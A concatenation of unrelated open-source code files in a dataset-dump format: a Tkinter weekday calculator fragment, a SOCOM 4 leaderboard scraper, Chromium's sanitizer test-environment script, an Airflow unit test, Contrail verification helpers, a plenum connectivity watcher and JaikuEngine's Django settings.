elif int(day) <= int(lastday):
self.change_display(self.Weekdaydisplay, self.message(year, month, day))
except:
self.error_display(self.Extradisplay, 'Enter day between 1-' + lastday)
#Displays given weekday on the 'Weekday' entry box
def change_display(self, func, text):
func.configure(state='normal')
func.delete(0,END)
func.insert(INSERT, text)
func.configure(state='readonly')
#Error output
def error_display(self, func, text):
self.change_display(func, text)
#Returns message for output on entry box
def message(self, year, month, day):
weekday = ['Sunday', 'Monday', 'Tuesday',
'Wednesday', 'Thursday', 'Friday', 'Saturday']
a = int((14 - int(month))/12)
y = int(year) - a
m = int(month) + (12*a) -2
d = (int(day) + y + int(y/4) - int(y/100) +
int(y/400) + int((31*m)/12)) % 7
x = weekday[d]
name = self.wordmonth(month)
Day = self.ordinal(day)
StrYear = int(strftime('%Y'))
StrMonth = int(strftime('%m'))
StrDay = int(strftime('%d'))
DisplayTime = self.JulianDN(year, month, day)
CurrentDate = self.JulianDN(StrYear, StrMonth, StrDay)
if DisplayTime == CurrentDate:
message = self.r_output('Today is a ', x)
elif DisplayTime == CurrentDate + 1:
message = self.r_output('Tomorrow will be a ', x)
elif DisplayTime == CurrentDate - 1:
message = self.r_output('Yesterday was a ', x)
elif DisplayTime > CurrentDate:
message = self.g_output(name, Day, year, ' will be a ', x)
elif DisplayTime < CurrentDate:
message = self.g_output(name, Day, year, ' was a ', x)
return message
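    #Editor's note: worked example of the weekday congruence above, added for
    #clarity and not part of the original program. For 2000-01-01:
    #  a = int((14 - 1) / 12) = 1, y = 2000 - 1 = 1999, m = 1 + 12*1 - 2 = 11
    #  d = (1 + 1999 + 499 - 19 + 4 + 28) % 7 = 2512 % 7 = 6 -> weekday[6] = 'Saturday'
    #January 1, 2000 was indeed a Saturday.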
#Output if given date is today, yesterday or tomorrow
def r_output(self, text, day_of_week):
output = (text + day_of_week)
return output
#Output for days before or after current date
def g_output(self, Month, Day, Year, text, day_of_week):
output = (Month + ' ' + Day + ', ' + Year + text + day_of_week)
return output
#Returns ordinal for given day number
def ordinal(self, day):
teen_numbers = [11, 12, 13, 14, 15, 16, 17, 18, 19]
output = ['th','st', 'nd', 'rd', 'th', 'th',
'th', 'th', 'th', 'th', 'th']
if int(day) in teen_numbers:
return (day + 'th')
else:
return (day + output[int(day[-1])])
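    #Editor's note: illustrative results of ordinal(), added for clarity:
    #  ordinal('1') -> '1st', ordinal('2') -> '2nd', ordinal('3') -> '3rd'
    #  ordinal('11') -> '11th', ordinal('12') -> '12th', ordinal('23') -> '23rd'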
#Calculates given weekday with Julian Date Number
def JulianDN(self, Y,M,D):
a = int((14 - int(M))/12)
y = int(Y) + 4800 - a
m = int(M) + (12 * a) - 3
JDN = (int(D) + int(((153 * m) + 2) /5) + (365 * y)
+ int(y/4) - int(y/100) + int(y/400) - 32045)
return JDN
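    #Editor's note: worked example of the Julian Day Number formula above, added
    #for clarity and not part of the original program. For 2000-01-01:
    #  a = 1, y = 2000 + 4800 - 1 = 6799, m = 1 + 12 - 3 = 10
    #  JDN = 1 + 306 + 2481635 + 1699 - 67 + 16 - 32045 = 2451545
    #which matches the published Julian Day Number for 2000-01-01.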
#Return month name from input
def wordmonth(self, month):
monthname = [word for word in self.months if word.istitle()]
Month = int(month) -1
return monthname[Month]
root = Tk()
Calculator(root)
root.mainloop()
| apache-2.0 | -7,962,390,991,995,282,000 | 39.251701 | 95 | 0.496704 | false |
aleximplode/s4scraper | scrapef.py | 1 | 9681 | #!/usr/bin/python
'''
Author: Alexander Godlewski
Year: 2011
A script to browse through the leaderboards for SOCOM 4,
using multiprocessing to overcome network blocking.
Gathers the results and dumps them to a CSV file.
There are issues with the implementation of the leaderboards
that cause the time played for a player to often be
synchronized to 60-minute changes.
Another issue is that the leaderboards are constantly changing
across page views, so a player may move from one page to
another and be re-parsed, while another player could move to
an already-parsed page and not be recorded. It would take repeated
runs of this script to gather all the players.
Expect this process to take approx. 21 minutes or more, depending on how
many processes you choose (variable numproc). It has to gather 100k
players over 5k pages.
'''
import urllib2, urllib, re, os, multiprocessing
from time import time
manager = multiprocessing.Manager()
requestcount = manager.Value('d', 0)
pages = manager.Value('d', 0)
playerdata = manager.dict()
numproc = 24
processes = []
waitevent = manager.Event()
procwait = manager.Value('d', numproc)
procwaitlock = manager.Lock()
pagelist = manager.list()
pagelistlock = manager.Lock()
pagecountlock = manager.Lock()
requestcountlock = manager.Lock()
playerdatalock = manager.Lock()
# Regexs
re_viewstate = re.compile(r'__VIEWSTATE" value="(?P<viewstate>.*?)"')
re_records = re.compile(r'Displaying .*? of (?P<records>[0-9,]*) records')
re_pages = re.compile(r'<a id="ctl00_phContent_leaderboards_pager_btnLast".*?>\.\.\. (?P<pages>\d*)</a>')
re_player = re.compile(r'<span id="ctl00_phContent_leaderboards_rptStatsTable_ctl.*?<tr.*?>(?:</span>)?(?P<player>.*?)</tr>', re.DOTALL) # Get a player block
re_playeritems = re.compile(r'<td class=".*?">(?:\s*<a.*?>)?(?P<data>.+?)(?:</a>\s*)?</td>', re.DOTALL) # Individual player fields
re_prevpage = re.compile(r'__PREVIOUSPAGE" value="(?P<prev>.*?)"') # Previous page key
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:6.0) Gecko/20100101 Firefox/6.0 Iceweasel/6.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Connection': 'keep-alive',
'Cache-Control': 'no-cache, no-cache',
}
def scrape():
''' The main scraping function '''
t0 = time()
try:
for i in range(1, numproc + 1):
process = multiprocessing.Process(
target = scrapeproc,
args = (
waitevent,
pagelist,
pagelistlock,
procwait,
procwaitlock,
playerdatalock,
requestcountlock,
pagecountlock,
pages,
i - 1,
playerdata,
requestcount
)
)
processes.append(process)
process.start()
for p in processes:
p.join()
except urllib2.HTTPError, error:
print ''
print 'There has been an error with the following request:'
print '%4d: %d - %s' % (requestcount, error.getcode(), error.geturl())
for p in processes:
p.terminate()
t1 = time()
print ''
print '###########################################################################'
print '%d second%s elapsed(%4d requests, %6d players)' % (t1 - t0, '' if t1 - t0 == 1 else 's', requestcount.value, len(playerdata))
print '###########################################################################'
filename = 'output-%s-%s.csv' % (int(time()), os.getpid())
print ''
print 'Outputting the playerdata to %s' % filename
outputcsv(filename)
def scrapeproc(we, pl, pllock, pw, pwlock, pdlock, rclock, plock, p, offset, pd, rc):
''' A process to scrape pages '''
opener = urllib2.build_opener()
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPCookieProcessor())
opener.add_handler(urllib2.HTTPRedirectHandler())
opener.add_handler(urllib2.UnknownHandler())
data = readurl(rclock, requestcount, opener, 'http://www.socom.com/en-us/Leaderboards/SOCOM4', 'Initial page request')
vs = parseviewstate(data)
postdata = genpostdata(vs, '', 'lbsubmit', {'dlDate1': 7, 'dlDate2': 21, 'dlDate3': 1986, 'scriptManager': 'panelCulture|lbSubmit'})
data = readurl(rclock, requestcount, opener, 'http://www.socom.com/?url=%2fen-us%2fLeaderboards%2fSOCOM4', 'Submit to agegate', postdata)
data = readurl(rclock, requestcount, opener, 'http://www.socom.com/en-us/Leaderboards/SOCOM4', 'Load first leaderboard page')
pagecount = parsepagecount(data)
plock.acquire()
if pagecount > p.value:
p.value = pagecount
plock.release()
# Decrement procwait count, at 0 continue
pwlock.acquire()
if pw.value == 1:
print 'Expecting %d pages' % p.value
pl.extend(range(1, p.value + 1))
we.set()
pw.value = pw.value - 1
pwlock.release()
# Wait until all processes have reached the same point so
# the page count is at the max value found. All
# openerdirectors are prepared to visit the pages
we.wait()
# Loop until there are no more pages left to be parsed
while True:
pllock.acquire()
# No pages left
if not pl:
pllock.release()
break
pagenum = pl.pop(0)
pllock.release()
vs = parseviewstate(data)
prev = parseprevpagekey(data)
postdata = genpostdata(vs, '', '',
{
'__PREVIOUSPAGE': prev,
'ctl00$phContent$leaderboards$txtName': '',
'ctl00$phContent$leaderboards$btnGoToRank': 'GO',
'ctl00$phContent$leaderboards$txtRank': ((pagenum - 1) * 20) + 1,
'ctl00$scriptManager': 'ctl00$phContent$leaderboards$panelLeaderBoards|ctl00$phContent$leaderboards$btnGoToRank'
}
)
data = readurl(rclock, rc, opener, 'http://www.socom.com/en-us/Leaderboards/SOCOM4', 'LB page %d of %d' % (pagenum, p.value), postdata)
parseplayers(pdlock, pd, data)
def readurl(rclock, rc, od, url, name, data = []):
''' Read a url and print info '''
rclock.acquire()
currequestnum = rc.value + 1
rc.value += 1
rclock.release()
req = urllib2.Request(url, urllib.urlencode(data), headers)
page = od.open(req)
print '%4d: %d - (%s)%s' % (currequestnum, page.getcode(), name, page.geturl())
return page.read()
def parseplayers(pdlock, pd, data):
''' Parse the player data for a response '''
matches = re_player.findall(data)
for match in matches:
fields = re_playeritems.findall(match)
name = fields[1].strip().replace(',', '')
pdlock.acquire()
if name in pd:
print 'WARNING: %s already parsed' % name
pd[name] = tuple(fields[i].strip().replace(',', '') for i in (0, 2, 3, 4, 5, 6, 7, 8))
pdlock.release()
def parseviewstate(data):
''' Parse the viewstate for a response '''
rval = None
match = re_viewstate.search(data)
if match:
rval = match.group('viewstate')
return rval
def parsepagecount(data):
''' Get the page count to show the expected number of pages scraped '''
rval = 0
match = re_pages.search(data)
if match:
rval = int(match.group('pages'))
return rval
def parseprevpagekey(data):
''' Get the previous page key '''
rval = None
match = re_prevpage.search(data)
if match:
rval = match.group('prev')
return rval
def genpostdata(vs, ea, et, other = None):
''' Generate a POST dict, just simplifies code
vs = viewstate
ea = event arguement
et = event target
other = other post data (dict)
'''
data = dict()
data['__VIEWSTATE'] = vs
data['__EVENTARGUMENT'] = ea
data['__EVENTTARGET'] = et
if other:
data = dict(data.items() + other.items())
return data
def outputcsv(filename):
''' Output the csv file '''
try:
f = open(filename, 'w')
for name, data in playerdata.items():
f.write('%s,%s\n' % (name, ','.join(data)))
f.close()
except IOError:
print 'There was an issue writing to %s' % filename
if __name__ == '__main__':
scrape() | mit | -3,767,706,355,816,823,300 | 34.595588 | 157 | 0.528664 | false |
highweb-project/highweb-webcl-html5spec | testing/test_env.py | 12 | 8394 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Sets environment variables needed to run a chromium unit test."""
import os
import stat
import subprocess
import sys
# This is hardcoded to be src/ relative to this script.
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CHROME_SANDBOX_ENV = 'CHROME_DEVEL_SANDBOX'
CHROME_SANDBOX_PATH = '/opt/chromium/chrome_sandbox'
def get_sandbox_env(env):
"""Returns the environment flags needed for the SUID sandbox to work."""
extra_env = {}
chrome_sandbox_path = env.get(CHROME_SANDBOX_ENV, CHROME_SANDBOX_PATH)
# The above would silently disable the SUID sandbox if the env value were
# an empty string. We don't want to allow that. http://crbug.com/245376
# TODO(jln): Remove this check once it's no longer possible to disable the
# sandbox that way.
if not chrome_sandbox_path:
chrome_sandbox_path = CHROME_SANDBOX_PATH
extra_env[CHROME_SANDBOX_ENV] = chrome_sandbox_path
return extra_env
def trim_cmd(cmd):
"""Removes internal flags from cmd since they're just used to communicate from
the host machine to this script running on the swarm slaves."""
sanitizers = ['asan', 'lsan', 'msan', 'tsan']
internal_flags = frozenset('--%s=%d' % (name, value)
for name in sanitizers
for value in [0, 1])
return [i for i in cmd if i not in internal_flags]
def fix_python_path(cmd):
"""Returns the fixed command line to call the right python executable."""
out = cmd[:]
if out[0] == 'python':
out[0] = sys.executable
elif out[0].endswith('.py'):
out.insert(0, sys.executable)
return out
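# Editor's note: illustrative behaviour, added for clarity and not part of the
# original script. With sys.executable set to '/usr/bin/python2.7' (a made-up
# path):
#
#   fix_python_path(['python', 'foo.py', '--bar'])
#       -> ['/usr/bin/python2.7', 'foo.py', '--bar']
#   fix_python_path(['foo.py', '--bar'])
#       -> ['/usr/bin/python2.7', 'foo.py', '--bar']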
def get_sanitizer_env(cmd, asan, lsan, msan, tsan):
"""Returns the envirnoment flags needed for sanitizer tools."""
extra_env = {}
# Instruct GTK to use malloc while running sanitizer-instrumented tests.
extra_env['G_SLICE'] = 'always-malloc'
extra_env['NSS_DISABLE_ARENA_FREE_LIST'] = '1'
extra_env['NSS_DISABLE_UNLOAD'] = '1'
# TODO(glider): remove the symbolizer path once
# https://code.google.com/p/address-sanitizer/issues/detail?id=134 is fixed.
symbolizer_path = os.path.join(ROOT_DIR,
'third_party', 'llvm-build', 'Release+Asserts', 'bin', 'llvm-symbolizer')
if lsan or tsan:
# LSan is not sandbox-compatible, so we can use online symbolization. In
# fact, it needs symbolization to be able to apply suppressions.
symbolization_options = ['symbolize=1',
'external_symbolizer_path=%s' % symbolizer_path]
elif (asan or msan) and sys.platform not in ['win32', 'cygwin']:
# ASan uses a script for offline symbolization, except on Windows.
# Important note: when running ASan with leak detection enabled, we must use
# the LSan symbolization options above.
symbolization_options = ['symbolize=0']
# Set the path to llvm-symbolizer to be used by asan_symbolize.py
extra_env['LLVM_SYMBOLIZER_PATH'] = symbolizer_path
else:
symbolization_options = []
if asan:
asan_options = symbolization_options[:]
if lsan:
asan_options.append('detect_leaks=1')
if asan_options:
extra_env['ASAN_OPTIONS'] = ' '.join(asan_options)
if sys.platform == 'darwin':
isolate_output_dir = os.path.abspath(os.path.dirname(cmd[0]))
# This is needed because the test binary has @executable_path embedded in
# it that the OS tries to resolve to the cache directory and not the
# mapped directory.
extra_env['DYLD_LIBRARY_PATH'] = str(isolate_output_dir)
if lsan:
if asan or msan:
lsan_options = []
else:
lsan_options = symbolization_options[:]
if sys.platform == 'linux2':
# Use the debug version of libstdc++ under LSan. If we don't, there will
# be a lot of incomplete stack traces in the reports.
extra_env['LD_LIBRARY_PATH'] = '/usr/lib/x86_64-linux-gnu/debug:'
extra_env['LSAN_OPTIONS'] = ' '.join(lsan_options)
if msan:
msan_options = symbolization_options[:]
if lsan:
msan_options.append('detect_leaks=1')
extra_env['MSAN_OPTIONS'] = ' '.join(msan_options)
if tsan:
tsan_options = symbolization_options[:]
extra_env['TSAN_OPTIONS'] = ' '.join(tsan_options)
return extra_env
def get_sanitizer_symbolize_command(json_path=None, executable_path=None):
"""Construct the command to invoke offline symbolization script."""
script_path = os.path.join(
ROOT_DIR, 'tools', 'valgrind', 'asan', 'asan_symbolize.py')
cmd = [sys.executable, script_path]
if json_path is not None:
cmd.append('--test-summary-json-file=%s' % json_path)
if executable_path is not None:
cmd.append('--executable-path=%s' % executable_path)
return cmd
def get_json_path(cmd):
"""Extract the JSON test summary path from a command line."""
json_path_flag = '--test-launcher-summary-output='
for arg in cmd:
if arg.startswith(json_path_flag):
return arg.split(json_path_flag).pop()
return None
def symbolize_snippets_in_json(cmd, env):
"""Symbolize output snippets inside the JSON test summary."""
json_path = get_json_path(cmd)
if json_path is None:
return
try:
symbolize_command = get_sanitizer_symbolize_command(
json_path=json_path, executable_path=cmd[0])
p = subprocess.Popen(symbolize_command, stderr=subprocess.PIPE, env=env)
(_, stderr) = p.communicate()
except OSError as e:
print >> sys.stderr, 'Exception while symbolizing snippets: %s' % e
raise
if p.returncode != 0:
print >> sys.stderr, "Error: failed to symbolize snippets in JSON:\n"
print >> sys.stderr, stderr
raise subprocess.CalledProcessError(p.returncode, symbolize_command)
def run_executable(cmd, env):
"""Runs an executable with:
- environment variable CR_SOURCE_ROOT set to the root directory.
- environment variable LANGUAGE to en_US.UTF-8.
- environment variable CHROME_DEVEL_SANDBOX set
- Reuses sys.executable automatically.
"""
extra_env = {}
  # Many tests assume an English interface...
extra_env['LANG'] = 'en_US.UTF-8'
# Used by base/base_paths_linux.cc as an override. Just make sure the default
# logic is used.
env.pop('CR_SOURCE_ROOT', None)
extra_env.update(get_sandbox_env(env))
# Copy logic from tools/build/scripts/slave/runtest.py.
asan = '--asan=1' in cmd
lsan = '--lsan=1' in cmd
msan = '--msan=1' in cmd
tsan = '--tsan=1' in cmd
if sys.platform in ['win32', 'cygwin']:
# Symbolization works in-process on Windows even when sandboxed.
use_symbolization_script = False
else:
# LSan doesn't support sandboxing yet, so we use the in-process symbolizer.
# Note that ASan and MSan can work together with LSan.
use_symbolization_script = (asan or msan) and not lsan
if asan or lsan or msan or tsan:
extra_env.update(get_sanitizer_env(cmd, asan, lsan, msan, tsan))
if lsan or tsan:
# LSan and TSan are not sandbox-friendly.
cmd.append('--no-sandbox')
cmd = trim_cmd(cmd)
# Ensure paths are correctly separated on windows.
cmd[0] = cmd[0].replace('/', os.path.sep)
cmd = fix_python_path(cmd)
print('Additional test environment:\n%s\n'
'Command: %s\n' % (
'\n'.join(' %s=%s' %
(k, v) for k, v in sorted(extra_env.iteritems())),
' '.join(cmd)))
env.update(extra_env or {})
try:
# See above comment regarding offline symbolization.
if use_symbolization_script:
# Need to pipe to the symbolizer script.
p1 = subprocess.Popen(cmd, env=env, stdout=subprocess.PIPE,
stderr=sys.stdout)
p2 = subprocess.Popen(
get_sanitizer_symbolize_command(executable_path=cmd[0]),
env=env, stdin=p1.stdout)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
p1.wait()
p2.wait()
# Also feed the out-of-band JSON output to the symbolizer script.
symbolize_snippets_in_json(cmd, env)
return p1.returncode
else:
return subprocess.call(cmd, env=env)
except OSError:
print >> sys.stderr, 'Failed to start %s' % cmd
raise
def main():
return run_executable(sys.argv[1:], os.environ.copy())
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | -6,769,126,356,607,834,000 | 33.68595 | 80 | 0.668096 | false |
nathanielvarona/airflow | tests/task/task_runner/test_cgroup_task_runner.py | 3 | 1867 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
from airflow.task.task_runner.cgroup_task_runner import CgroupTaskRunner
class TestCgroupTaskRunner(unittest.TestCase):
@mock.patch("airflow.task.task_runner.base_task_runner.BaseTaskRunner.__init__")
@mock.patch("airflow.task.task_runner.base_task_runner.BaseTaskRunner.on_finish")
def test_cgroup_task_runner_super_calls(self, mock_super_on_finish, mock_super_init):
"""
This test ensures that initiating CgroupTaskRunner object
calls init method of BaseTaskRunner,
and when task finishes, CgroupTaskRunner.on_finish() calls
super().on_finish() to delete the temp cfg file.
"""
local_task_job = mock.Mock()
local_task_job.task_instance = mock.MagicMock()
local_task_job.task_instance.run_as_user = None
local_task_job.task_instance.command_as_list.return_value = ['sleep', '1000']
runner = CgroupTaskRunner(local_task_job)
assert mock_super_init.called
runner.on_finish()
assert mock_super_on_finish.called
| apache-2.0 | 6,412,202,582,494,916,000 | 42.418605 | 89 | 0.728441 | false |
vmahuli/contrail-controller | src/config/test/utils/verification_util.py | 29 | 3819 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import urllib2
import xmltodict
import json
import requests
from lxml import etree
import socket
class JsonDrv (object):
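    """Driver that loads a URL over HTTP and parses the response as JSON."""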
def _http_con(self, url):
return urllib2.urlopen(url)
def load(self, url):
return json.load(self._http_con(url))
class XmlDrv (object):
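    """Driver that loads a URL over HTTP and parses the response into an lxml etree."""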
def load(self, url):
try:
resp = requests.get(url)
return etree.fromstring(resp.text)
except requests.ConnectionError, e:
print "Socket Connection error : " + str(e)
return None
class VerificationUtilBase (object):
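    """Base helper that builds http://<ip>:<port>/<path> URLs and loads them
    through a pluggable driver (JSON by default, XML via XmlDrv)."""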
def __init__(self, ip, port, drv=JsonDrv):
self._ip = ip
self._port = port
self._drv = drv()
self._force_refresh = False
def get_force_refresh(self):
return self._force_refresh
def set_force_refresh(self, force=False):
self._force_refresh = force
return self.get_force_refresh()
def _mk_url_str(self, path):
if path:
if path.startswith('http:'):
return path
return "http://%s:%d/%s" % (self._ip, self._port, path)
def dict_get(self, path='', drv=None):
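        """Fetch the given path (or full URL) and return the parsed result, or None on HTTP error."""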
try:
if path:
if drv is not None:
return drv().load(self._mk_url_str(path))
return self._drv.load(self._mk_url_str(path))
except urllib2.HTTPError:
return None
# end dict_get
class Result (dict):
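    """Dictionary wrapper providing simple nested key lookup via xpath()."""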
def __init__(self, d={}):
super(Result, self).__init__()
self.update(d)
def xpath(self, *plist):
''' basic path '''
d = self
for p in plist:
d = d[p]
return d
class EtreeToDict(object):
"""Converts the xml etree to dictionary/list of dictionary."""
def __init__(self, xpath):
self.xpath = xpath
def _handle_list(self, elems):
"""Handles the list object in etree."""
a_list = []
for elem in elems.getchildren():
rval = self._get_one(elem, a_list)
if 'element' in rval.keys():
a_list.append(rval['element'])
elif 'list' in rval.keys():
a_list.append(rval['list'])
else:
a_list.append(rval)
if not a_list:
return None
return a_list
def _get_one(self, xp, a_list=None):
"""Recrusively looks for the entry in etree and converts to dictionary.
Returns a dictionary.
"""
val = {}
child = xp.getchildren()
if not child:
val.update({xp.tag: xp.text})
return val
for elem in child:
if elem.tag == 'list':
val.update({xp.tag: self._handle_list(elem)})
else:
rval = self._get_one(elem, a_list)
if elem.tag in rval.keys():
val.update({elem.tag: rval[elem.tag]})
else:
val.update({elem.tag: rval})
return val
def get_all_entry(self, path):
"""All entries in the etree is converted to the dictionary
Returns the list of dictionary/didctionary.
"""
xps = path.xpath(self.xpath)
if type(xps) is not list:
return self._get_one(xps)
val = []
for xp in xps:
val.append(self._get_one(xp))
if len(val) == 1:
return val[0]
return val
def find_entry(self, path, match):
"""Looks for a particular entry in the etree.
Returns the element looked for/None.
"""
xp = path.xpath(self.xpath)
f = filter(lambda x: x.text == match, xp)
if len(f):
return f[0].text
return None
| apache-2.0 | 2,835,414,122,174,178,300 | 24.46 | 79 | 0.524221 | false |
evernym/zeno | plenum/server/inconsistency_watchers.py | 2 | 1031 | from typing import Callable, Iterable
from plenum.server.quorums import Quorums
class NetworkInconsistencyWatcher:
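    """Tracks node connectivity and invokes the callback when a weak quorum of
    connections is lost after consensus had previously been reached."""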
def __init__(self, cb: Callable):
self.callback = cb
self._nodes = set()
self._connected = set()
self._quorums = Quorums(0)
self._reached_consensus = False
def connect(self, name: str):
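        """Mark a node as connected; remember that consensus was reached once a strong quorum is connected."""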
self._connected.add(name)
if self._quorums.strong.is_reached(len(self._connected)):
self._reached_consensus = True
def disconnect(self, name: str):
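        """Mark a node as disconnected; if consensus had been reached and the weak quorum is lost, fire the callback."""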
self._connected.discard(name)
if self._reached_consensus and not self._quorums.weak.is_reached(len(self._connected)):
self._reached_consensus = False
self.callback()
@property
def nodes(self):
return self._nodes
def set_nodes(self, nodes: Iterable[str]):
self._nodes = set(nodes)
self._quorums = Quorums(len(self._nodes))
def _has_consensus(self):
return self._quorums.weak.is_reached(len(self._connected))
| apache-2.0 | -8,176,798,623,406,414,000 | 30.242424 | 95 | 0.627546 | false |
rhijul/jaikuengine | settings.py | 28 | 11254 | # Copyright 2009 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import os.path
###
# Django related settings
###
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
# This stuff is always going to be the same for an App Engine instance
DATABASE_ENGINE = 'appengine' # 'appengine' is the only supported engine
DATABASE_NAME = '' # Not used with appengine
DATABASE_USER = '' # Not used with appengine
DATABASE_PASSWORD = '' # Not used with appengine
DATABASE_HOST = '' # Not used with appengine
DATABASE_PORT = '' # Not used with appengine
# The appengine_django code doesn't care about the address of memcached
# because it is a built in API for App Engine
CACHE_BACKEND = 'memcached://'
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'I AM SO SECRET'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'middleware.domain.DomainMiddleware',
'middleware.auth.AuthenticationMiddleware',
'middleware.exception.ExceptionMiddleware',
'middleware.cache.CacheMiddleware',
'middleware.strip_whitespace.WhitespaceMiddleware',
'middleware.profile.ProfileMiddleware',
)
ROOT_URLCONF = 'urls'
# Where the templates live, you probably don't want to change this unless you
# know what you're doing
TEMPLATE_DIRS = (
os.path.dirname(__file__),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.debug',
'django.core.context_processors.request',
'common.context_processors.settings',
'common.context_processors.flash',
'common.context_processors.components',
)
# Only apps under INSTALLED_APPS will be automatically tested via
# `python manage.py test` and the profiling code takes this list into
# account while filtering calls
INSTALLED_APPS = (
'appengine_django',
'common',
'actor',
'api',
'channel',
'explore',
'join',
'flat',
'login',
'front',
'invite',
'install',
'confirm',
'components',
)
# We override the default test runner so that we can be Totally Awesome
TEST_RUNNER = 'common.test.runner.run_tests'
####
#
# Below this is custom for Jaiku Engine (not related to Django)
#
####
# This is a dynamic setting so that we can check whether we have been run
# locally, it is used mainly for making special testing-only tweaks. Ideally
# we wouldn't need this, but the alternatives so far have been tricky.
MANAGE_PY = os.path.exists('manage.py')
# This is the name of the site that will be used whenever it refers to itself
SITE_NAME = 'My-ku'
SUPPORT_CHANNEL = 'support'
# This is the colloquial name for an entry, mostly used for branding purposes
POST_NAME = 'Post'
# This is the name of the root user of the site
ROOT_NICK = '[email protected]'
# This is the domain where this is installed on App Engine. It will be
# necessary to know this if you plan on enabling SSL for login and join.
GAE_DOMAIN = 'example.appspot.com'
# Enabling this means we expect to be spending most of our time on a
# Hosted domain
HOSTED_DOMAIN_ENABLED = True
# This is the domain you intend to serve your site from, when using hosted
# domains. If SSL is enabled for login and join those requests will still
# go to the GAE_DOMAIN above.
HOSTED_DOMAIN = 'example.com'
# App Engine requires you to serve with a subdomain
DEFAULT_HOSTED_SUBDOMAIN = 'www'
NS_DOMAIN = 'example.com'
# DOMAIN will be used wherever a url to this site needs to be created
# NS_DOMAIN will be used as the domain part of actor identifiers.
# Note that changing this once you have deployed the site will likely result
# in catastrophic failure.
if HOSTED_DOMAIN_ENABLED:
DOMAIN = '%s.%s' % (DEFAULT_HOSTED_SUBDOMAIN, HOSTED_DOMAIN)
else:
DOMAIN = GAE_DOMAIN
# Subdomains aren't supported all that nicely by App Engine yet, so you
# probably won't be able to enable WILDCARD_SUBDOMAINS below, but you can
# still set up your app to use some of the static subdomains below.
# Subdomains are ignored unless HOSTED_DOMAIN_ENABLED is True.
SUBDOMAINS_ENABLED = False
WILDCARD_USER_SUBDOMAINS_ENABLED = False
# These are defined as { subdomain : url_conf, ...}
INSTALLED_SUBDOMAINS = {
'api': 'api.urls', # api-only urlconf
'm': 'urls', # default urlconf, but allow the subdomain
}
# Enable SSL support for login and join, if using HOSTED_DOMAIN_ENABLED
# this means you will be redirecting through https://GAE_DOMAIN/login
# and https://GAE_DOMAIN/join for those respective actions.
SSL_LOGIN_ENABLED = False
#
# Appearance / Theme
#
# The default theme to use
DEFAULT_THEME = 'trotz'
#
# Cookie
#
# Cookie settings, pretty self explanatory, you shouldn't need to touch these.
USER_COOKIE = 'user'
PASSWORD_COOKIE = 'password'
COOKIE_DOMAIN = '.%s' % DOMAIN
COOKIE_PATH = '/'
#
# Blog
#
# Do you want /blog to redirect to your blog?
BLOG_ENABLED = False
# Where is your blog?
BLOG_URL = 'http://example.com'
BLOG_FEED_URL = 'http://example.com/feeds'
#
# API
#
# Setting this to True will make the public API accept all requests as being
# from ROOT with no regard to actual authentication.
# Never this set to True on a production site.
API_DISABLE_VERIFICATION = False
# These next three determine which OAuth Signature Methods to allow.
API_ALLOW_RSA_SHA1 = True
API_ALLOW_HMAC_SHA1 = True
API_ALLOW_PLAINTEXT = False
# These three determine whether the ROOT use should be allowed to use these
# methods, if any at all. Setting all of these to False will disable the
# ROOT user from accessing the public API
API_ALLOW_ROOT_RSA_SHA1 = True
API_ALLOW_ROOT_HMAC_SHA1 = True
API_ALLOW_ROOT_PLAINTEXT = False
# OAuth consumer key and secret values
ROOT_TOKEN_KEY = 'ROOT_TOKEN_KEY'
ROOT_TOKEN_SECRET = 'ROOT_TOKEN_SECRET'
ROOT_CONSUMER_KEY = 'ROOT_CONSUMER_KEY'
ROOT_CONSUMER_SECRET = 'ROOT_CONSUMER_SECRET'
# Allow support for legacy API authentication
API_ALLOW_LEGACY_AUTH = False
LEGACY_SECRET_KEY = 'I AM ALSO SECRET'
#
# SMS
#
# Enabling SMS will require a bit more than just making this True, please
# read the docs at http://code.google.com/p/jaikuengine/wiki/sms_support
SMS_ENABLED = False
